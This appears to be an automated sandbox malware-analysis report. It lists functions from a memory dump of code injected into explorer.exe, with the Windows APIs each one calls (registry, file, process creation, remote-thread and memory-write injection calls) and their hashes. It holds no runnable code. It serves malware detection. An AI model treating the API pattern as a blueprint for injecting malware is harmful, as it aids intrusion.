Opcode Fuzzy Hash: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
Instruction Fuzzy Hash: B3526530718B498FEB64DF24E8997AA77E2FB98305F44852ED48AC3260DF78E545CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04DBF770, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 490
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClassA.USER32 ref: 04DBF833
CreateWindowExA.USER32 ref: 04DBF87C

Strings

~, xrefs: 04DBFB5E
rLoa, xrefs: 04DBF9C2
rGet, xrefs: 04DBF9EF

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ClassCreateRegisterWindow
String ID: rGet$rLoa$~
API String ID: 3469048531-56615508
Opcode ID: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
Instruction ID: 940de7e47d25e6fc1455f127b4016d98f9a4fbc97b242dc362c349ecf22c4456
Opcode Fuzzy Hash: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
Instruction Fuzzy Hash: A6E1B330618B09CFD728DF28DC956A6B7E1FB99314F14862ED4CBC3255EB34E5468B82

Uniqueness

Uniqueness Score: -1.00%

Function 04DC676C, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 643
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 04DC6C3F

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
Instruction ID: f5a12e4d95e63561b6b91f582d5a2b3ce75014945918d00b5422be5fb415274f
Opcode Fuzzy Hash: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
Instruction Fuzzy Hash: E4127430718F0A8FEB59EF68D894AA673E1FB98301F44462ED44AC3255EF34F9458B85

Uniqueness

Uniqueness Score: -1.00%

Function 04DC0034, Relevance: 6.4, APIs: 4, Instructions: 445
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32 ref: 04DC008A
RegQueryValueA.ADVAPI32 ref: 04DC00AD
RegQueryValueA.ADVAPI32 ref: 04DC00F4
RegCloseKey.KERNEL32 ref: 04DC018D

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
Instruction ID: 276d0085424b2a4df6f0fb2cb54a1c4b8984531edbaca336311d386d4c184528
Opcode Fuzzy Hash: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
Instruction Fuzzy Hash: 9CD1A83521CA49CFCB59EF68D885A6AB3E1FB98300F15456DE49BC3261DF34E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DA37B8, Relevance: 6.4, APIs: 4, Instructions: 365
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32 ref: 04DA38C2
FindFirstFileW.KERNEL32 ref: 04DA3A8C
FindNextFileW.KERNELBASE ref: 04DA3B67
FindClose.KERNEL32 ref: 04DA3B94

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Find$File$First$CloseNext
String ID:
API String ID: 2001080981-0
Opcode ID: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
Instruction ID: 25e8338dc4526b9c4f1caa2b3c7ad29763deb1b19f7713a58fd96c98b837cfa4
Opcode Fuzzy Hash: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
Instruction Fuzzy Hash: 6BC14D71618B498FDBA4EF28D88876A77F6FB98301F504539E84EC3265DB34E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DBF560, Relevance: 6.2, APIs: 4, Instructions: 197
nativethreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationProcess.NTDLL ref: 04DBF62A
CreateRemoteThread.KERNEL32 ref: 04DBF6DA

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateInformationProcessRemoteThread
String ID:
API String ID: 3020566308-0
Opcode ID: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
Instruction ID: ea5a9cd0fb4985854a18096821d11432fd81735934507730a5649cc586691732
Opcode Fuzzy Hash: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
Instruction Fuzzy Hash: 4451823061CB058FE758EF68D8996A677E1FB99301F00846DE98BC3261EA74E9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DCB516, Relevance: 4.8, APIs: 3, Instructions: 282
registrytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887

RegOpenKeyA.ADVAPI32 ref: 04DCB5C1
RegNotifyChangeKeyValue.KERNEL32 ref: 04DCB6BF
SetWaitableTimer.KERNEL32 ref: 04DCB765

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ChangeCreateNotifyOpenTimerValueWaitable
String ID:
API String ID: 146723190-0
Opcode ID: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
Instruction ID: e7068205b84ce76802fcbbb610fca5e283110d7dabe1e45eb0793c16f7772532
Opcode Fuzzy Hash: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
Instruction Fuzzy Hash: 109164307186498FEB64DF24D89976AB7E2FB88315F44852ED48AC3191DF78F941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DB387C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 04DB3A1E

Part of subcall function 04DBFFCC: NtMapViewOfSection.NTDLL ref: 04DC0018

Strings

0, xrefs: 04DB3A12

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
Instruction ID: 0723ffcbf3bd17fee08de955d3479133b6dc56a4145f0cd92d28070c9d854047
Opcode Fuzzy Hash: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
Instruction Fuzzy Hash: F761917061CB09CFDB54EF18D889AA577E5FB98301F10856ED88AC7261EB34E941CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 04DABAB4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 04DABAF1

Strings

@, xrefs: 04DABAD5

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
Instruction ID: 91cbc2bbf120007e05cecd01d9a6b1cfc99c42b365355226d761fd1aa98542b2
Opcode Fuzzy Hash: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
Instruction Fuzzy Hash: 77F09070A19B088FDB549FA8D8CD53976E0F748305F60096DE24AC7254EB78DA49C741

Uniqueness

Uniqueness Score: -1.00%

Function 04DAC134, Relevance: 1.9, APIs: 1, Instructions: 352COMMON

Download Yara Rule

APIs

Part of subcall function 04DB076C: RegQueryValueExA.KERNEL32 ref: 04DB07C3
Part of subcall function 04DB076C: RegCloseKey.KERNEL32 ref: 04DB0833

RtlDeleteBoundaryDescriptor.NTDLL ref: 04DAC1FF

Part of subcall function 04DCF04C: CallNamedPipeA.KERNEL32 ref: 04DCF141

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: BoundaryCallCloseDeleteDescriptorNamedPipeQueryValue
String ID:
API String ID: 615642425-0
Opcode ID: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
Instruction ID: 32086b6f0d3c159733b9e211464b392d5e80a58f2bee3551fc2767ce5e182eb9
Opcode Fuzzy Hash: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
Instruction Fuzzy Hash: 4FA17031728A088FE779EF28D88567AB3E2F789710F64453DD48FC3254DE34A8568782

Uniqueness

Uniqueness Score: -1.00%

Function 04DAB75C, Relevance: 1.8, APIs: 1, Instructions: 336COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 04DAB8FA

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
Instruction ID: 1df32facc04e9a2cc7718e50d7c654e2b6a5e9783ef4ff996723678426ed44e1
Opcode Fuzzy Hash: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
Instruction Fuzzy Hash: 50B18130618B098FD768DF1CD885666B7E1FB88311F54492EE98AC3251DB34F852CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DBAD14, Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 04DBAD7C

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0d84948e6804d05e2878778c5526aa8cb6ccf692f079d4c5b20dfd75fa335d05
Instruction ID: 5d2b34f82152eae346380bbff580dde108a073d7270371076defbb5bab67ad74
Opcode Fuzzy Hash: 0d84948e6804d05e2878778c5526aa8cb6ccf692f079d4c5b20dfd75fa335d05
Instruction Fuzzy Hash: 8C21A230308B098FDB59EF9D98847A577E2FB98311F448069D58AC7324EBB4E841C781

Uniqueness

Uniqueness Score: -1.00%

Function 04DB1AC4, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 04DB1AEA

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
Instruction ID: 687dfb8b8af6eefe2d84cbeb49ba1e3bf28d22dfaecd8f2bf67fc3d8f27b20f2
Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
Instruction Fuzzy Hash: 3C01A930328E4DCF9BA4DF69D4D8A7973E1FBA9345758056E944AC3120F738E885C741

Uniqueness

Uniqueness Score: -1.00%

Function 04DBFFCC, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 04DC0018

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 17e57012b22bbb7807ada4f0fcb1ccc05d9e02f8259fbf986f002438f2a97432
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 1601D670A08B048FCB44DF69D0C8569BBE1FB58315B10066FE949C7796DB71D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 04DACCA0, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 04DACCBF

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
Instruction ID: a05a1559cbfb0696a8720bb68c6062d7b14dccbb06027ab8d6b4208de6aeeeac
Opcode Fuzzy Hash: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
Instruction Fuzzy Hash: CBE09A70728A444BEB10AFB888C823832D0F788315F100839E886C3360E629D8A29202

Uniqueness

Uniqueness Score: -1.00%

Function 04DB3830, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 04DB384F

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
Instruction ID: a742667232f2e918776b957c81b7b33ec7eb3667f060cc9f1a295096cfa1d04d
Opcode Fuzzy Hash: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
Instruction Fuzzy Hash: B9E0DF38B15A418BEB006BB88CC82BC33E1F788301F200839EDC2C3320D729D844A783

Uniqueness

Uniqueness Score: -1.00%

Function 04DB9138, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
Instruction ID: 6fa61633623f301da9107cbe9f6fe95f315493041868d6fbe02c60fb75f91ee5
Opcode Fuzzy Hash: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
Instruction Fuzzy Hash: F461A331718A48DFDB64EF68D8996A9B3E2F798301F54453DD18BC3650DB34E816CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DC2B88, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32 ref: 04DC2C7E
GetExitCodeProcess.KERNEL32 ref: 04DC2D1E
FindCloseChangeNotification.KERNEL32 ref: 04DC2D29

Strings

h, xrefs: 04DC2BD0

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Process$ChangeCloseCodeCreateExitFindNotification
String ID: h
API String ID: 2788277846-2439710439
Opcode ID: 4af29ccb7016149927239b4020bbff63ea12dc1f6b6809e811fd2c520dc62f4a
Instruction ID: 48bf001ac8043250fdbdcd286f3c656ebf0f5ab8b265748a791ef46397f1d99a
Opcode Fuzzy Hash: 4af29ccb7016149927239b4020bbff63ea12dc1f6b6809e811fd2c520dc62f4a
Instruction Fuzzy Hash: 4B51767060CB498FE754DF68D8896AAB7E1FB98311F00456EE4CAC3260EF74D581CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04DC0F8C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887

RegQueryValueExA.KERNEL32 ref: 04DC0FF5
RegCloseKey.KERNEL32 ref: 04DC105E

Strings

(, xrefs: 04DC103D
(, xrefs: 04DC1001

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID: ($(
API String ID: 4083198587-222463766
Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
Instruction ID: 66e4fb66c3104e84834ff2f557c5a278bde28774329e9ef458c444ac3ecc83a3
Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
Instruction Fuzzy Hash: 8031A4747187998FF305DF54EC987AAB3E5F788304F10861ED44AC3261DB78A549DB42

Uniqueness

Uniqueness Score: -1.00%

Function 04DA27E8, Relevance: 6.2, APIs: 4, Instructions: 237
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNEL32 ref: 04DA2908
ResumeThread.KERNEL32 ref: 04DA2946
SuspendThread.KERNEL32 ref: 04DA296A
VirtualProtectEx.KERNEL32 ref: 04DA29E8

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ProtectThreadVirtual$ResumeSuspend
String ID:
API String ID: 3483329683-0
Opcode ID: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
Instruction ID: 940a2c15b2bbf8f9d012331a38c25aa57555837f4d7a179169f6a00486b26b81
Opcode Fuzzy Hash: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
Instruction Fuzzy Hash: 0B61C33171CB094FD768EF18E8957AA73E5FB89305F00096DE58AC3291EF34E9458B86

Uniqueness

Uniqueness Score: -1.00%

Function 04DB6BE4, Relevance: 6.2, APIs: 4, Instructions: 150
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 04DB6C43
SetFilePointer.KERNEL32 ref: 04DB6CD8
WriteFile.KERNEL32 ref: 04DB6CF5
SetEndOfFile.KERNEL32 ref: 04DB6D02

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: 29e005a1881ecf778232e2a7b5ce6567592faffa3b252627bb797e7c2a1e38ea
Instruction ID: 2a0e4e27b94538c6c6d451be31357c6c747184e8f540c848ec0997dd6e26d42b
Opcode Fuzzy Hash: 29e005a1881ecf778232e2a7b5ce6567592faffa3b252627bb797e7c2a1e38ea
Instruction Fuzzy Hash: E641C8302186044FE7185F1CA88A7B577D1F789315F64522DE4EBC3292EF78D8428686

Uniqueness

Uniqueness Score: -1.00%

Function 04DBE8C8, Relevance: 6.1, APIs: 4, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 04DBE999
SetFilePointer.KERNEL32 ref: 04DBE9B3
ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04DC6B1C), ref: 04DBE9D5
FindCloseChangeNotification.KERNEL32 ref: 04DBE9F0

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
Instruction ID: 076196da1517b2d1e88b8133a071d3d0e0bfdf460191df774b2d809b6e283a82
Opcode Fuzzy Hash: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
Instruction Fuzzy Hash: B1410C30218A188FDB58DF28D8C4AA977E1FB89315B24866DE19BC7266DF34D447CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 04DAFEB8, Relevance: 4.7, APIs: 3, Instructions: 169
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04DA37B8: FindFirstFileW.KERNEL32 ref: 04DA38C2

RegOpenKeyA.ADVAPI32 ref: 04DAFFD7
RegSetValueExA.KERNEL32 ref: 04DB000B
RegCloseKey.KERNEL32 ref: 04DB0019

Part of subcall function 04DB14E8: CreateFileW.KERNEL32 ref: 04DB1521

Part of subcall function 04DB6BE4: CreateFileW.KERNEL32 ref: 04DB6C43

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: File$Create$CloseFindFirstOpenValue
String ID:
API String ID: 3325113042-0
Opcode ID: 9eea1239f2a7d748ac6b5e741df024244af351a789541025a58a8a0caa0db7c1
Instruction ID: de8682e924b794892e94c4b4e1b5284ba71404d9b69c82e80d261763890b7b85
Opcode Fuzzy Hash: 9eea1239f2a7d748ac6b5e741df024244af351a789541025a58a8a0caa0db7c1
Instruction Fuzzy Hash: BF516F71608A488FEB69EF28D8D4A9A77E1F798304F60492EE04FC3155DF78E5468B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DA616C, Relevance: 4.7, APIs: 3, Instructions: 153
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 04DA6231
RegOpenKeyExW.KERNEL32 ref: 04DA6272
RegOpenKeyExW.KERNEL32 ref: 04DA62B3

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 42feb7ac68de671a04e3b49c6c16a059626e58c6f2e2e8ebad42a4df37ca4293
Instruction ID: 58a249eedd456ec5fe7ebd9115cf842786be8443d8997284705b477c86acd4cf
Opcode Fuzzy Hash: 42feb7ac68de671a04e3b49c6c16a059626e58c6f2e2e8ebad42a4df37ca4293
Instruction Fuzzy Hash: A3416631318B48CFDB59EF64D854A6AB7E6FBC8305F44492DE48AC3260DF74E9418B82

Uniqueness

Uniqueness Score: -1.00%

Function 04DCA7CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNEL32 ref: 04DCA842

Strings

(, xrefs: 04DCA835

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: Value
String ID: (
API String ID: 3702945584-3887548279
Opcode ID: 195edf72f10804976c373486aec15e12711837f57cdfe35952af4a769e913bde
Instruction ID: f08fee9d03f7420129b4456363d0f27cd7ab15b8fa54c4d7d240b47b2f26778a
Opcode Fuzzy Hash: 195edf72f10804976c373486aec15e12711837f57cdfe35952af4a769e913bde
Instruction Fuzzy Hash: 950140342197099FEB58DF68E8847AA77E0FB88304F40852DE84AC3351EB78E9418B41

Uniqueness

Uniqueness Score: -1.00%

Function 04DB33A4, Relevance: 3.2, APIs: 2, Instructions: 224pipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32 ref: 04DB341D

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: dd3c1dc1044215fc69d28a41122a1d296d5b50b482f3f9d8b2ae4cffdaebd157
Instruction ID: 634b6424ee7dc69addc61b22d2cfeff0f97e2d97ac7ce0ec4dcb85b5642688d4
Opcode Fuzzy Hash: dd3c1dc1044215fc69d28a41122a1d296d5b50b482f3f9d8b2ae4cffdaebd157
Instruction Fuzzy Hash: FD61A730718B058FD758EF38D4985BA77E2FB98311B548A2DE89BC32A5DF34D8419B81

Uniqueness

Uniqueness Score: -1.00%

Function 04DCFEB8, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04DC1458: VirtualProtect.KERNEL32 ref: 04DC148B

VirtualProtect.KERNEL32 ref: 04DCFFD6
VirtualProtect.KERNEL32 ref: 04DCFFF9

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
Instruction ID: 74ede531ea9088a8ac3f252538c17d1275daf0f84d562f8227228484b23a934e
Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
Instruction Fuzzy Hash: 85515B70718B098FEB45EF29D889A69B7E1FB9C305F10056EE44EC3261DB34E945CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04DAFD84, Relevance: 3.1, APIs: 2, Instructions: 123fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 04DAFE16
FindCloseChangeNotification.KERNEL32 ref: 04DAFE90

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: ChangeCloseFileFindNotificationRead
String ID:
API String ID: 1200561807-0
Opcode ID: 6848f4e2d5881aa74b5b1afec08c04206880bdc970ee2b74f368d5a17de0aa0c
Instruction ID: 5a00c056b338bdb66c24c0b7ae8d71689d97810843d6449975d01ac5789651f3
Opcode Fuzzy Hash: 6848f4e2d5881aa74b5b1afec08c04206880bdc970ee2b74f368d5a17de0aa0c
Instruction Fuzzy Hash: 5431B83061C7488FD768EF68E4CD669B7E0FB58301F10456EE88AC3252EF34DA558B86

Uniqueness

Uniqueness Score: -1.00%

Function 04DB14E8, Relevance: 3.1, APIs: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 04DB1521
ReadFile.KERNEL32 ref: 04DB1577

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
